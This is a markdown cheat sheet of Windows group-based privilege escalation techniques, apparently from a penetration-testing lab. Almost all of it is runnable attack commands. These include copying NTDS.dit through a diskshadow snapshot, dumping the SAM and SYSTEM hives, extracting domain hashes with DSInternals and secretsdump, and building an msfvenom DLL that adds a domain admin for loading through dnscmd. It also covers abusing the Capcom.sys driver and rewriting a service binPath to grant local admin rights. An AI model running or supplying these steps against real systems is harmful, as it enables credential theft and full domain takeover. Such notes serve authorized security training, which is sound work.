# Windows Group Privileges ## Backup Operators Membership of this group grants its members the SeBackup and SeRestore privileges. #### 1 Import DLLs ```powershell Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll ``` #### 2 Enable SebackupPrivilege ```powershell # Enable Set-SeBackupPrivilege # Verufy Get-SeBackupPrivilege ``` #### 3 Copy File ```powershell copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt ``` #### Copy NTDS.dit ```powershell diskshadow.exe DISKSHADOW> set verbose on DISKSHADOW> set metadata C:\Windows\Temp\meta.cab DISKSHADOW> set context clientaccessible DISKSHADOW> set context persistent DISKSHADOW> begin backup DISKSHADOW> add volume C: alias cdrive DISKSHADOW> create DISKSHADOW> expose %cdrive% E: DISKSHADOW> end backup DISKSHADOW> exit ``` #### Backup SAM + SYSTEM Hives ```powershell reg save HKLM\SYSTEM SYSTEM.SAV reg save HKLM\SAM SAM.SAV ``` #### Extract NTDS ```powershell Import-Module .\DSInternals.psd1 $key = Get-BootKey -SystemHivePath .\SYSTEM Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key ``` ## Event Log Reader ### Check Membership Group ```powershell net localgroup "Event Log Readers" ``` ### Searching Security Logs ```powershell # Without Credentials wevtutil qe Security /rd:true /f:text | Select-String "/user" # With Credentials wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user" ``` ## DnsAdmins #### 1 Generating Malicious DLL ```powershell msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll ``` #### 2 Load DLL ```powershell dnscmd.exe /config /serverlevelplugindll adduser.dll ``` #### 3 Restart Service ```powershell sc stop dns sc start dns ``` ## Print Operators Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down. ### 1 Compile CPP File ```powershell cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp ``` ### 2 Add Capcop.sys ```powershell reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys" reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1 ``` ### 3 Verify Privilege Enables ```powershell EnableSeLoadDriverPrivilege.exe ``` ### 4 Run Exploit ```powershell .\ExploitCapcom.exe ``` ## Server Operators Allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers. ### 1 Query Service ```powershell # Check if it's SYSTEM sc qc AppReadiness ``` ### 2 Service Permissions Check ```powershell c:\Tools\PsService.exe security AppReadiness ``` ### 3 Modify Service Binary Path ```powershell sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" ``` ### 4 Start / Stop Service ```powershell sc stop AppReadiness sc start AppReadiness ``` ### 5 Dump Hashes ```powershell secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator ```